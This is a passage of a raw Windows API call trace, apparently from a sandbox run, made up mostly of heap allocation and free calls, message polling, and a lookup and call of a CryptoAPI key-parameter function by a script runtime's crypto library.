lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0079.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0079.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0079.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.973] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0079.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0079.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0079.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0079.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0079.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0079.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0079.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0079.973] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0079.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb018 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0079.974] PeekMessageW (in: lpMsg=0x144dd94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dd94) returned 0 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0079.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0079.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0079.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0079.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0079.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0079.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0079.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0079.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0079.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0079.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.976] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0079.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0079.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.977] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0079.977] CryptGetKeyParam (in: hKey=0x41ac000, dwParam=0x7, pbData=0x43e27e0, pdwDataLen=0x144ddb0, dwFlags=0x0 | out: pbData=0x43e27e0*=0x6610, pdwDataLen=0x144ddb0*=0x4) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0079.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.979] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.979] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.979] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0079.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0079.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0079.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0079.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0079.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0079.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0079.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0079.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0079.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0079.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0079.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0079.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0079.980] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.980] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.980] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.980] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.994] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | 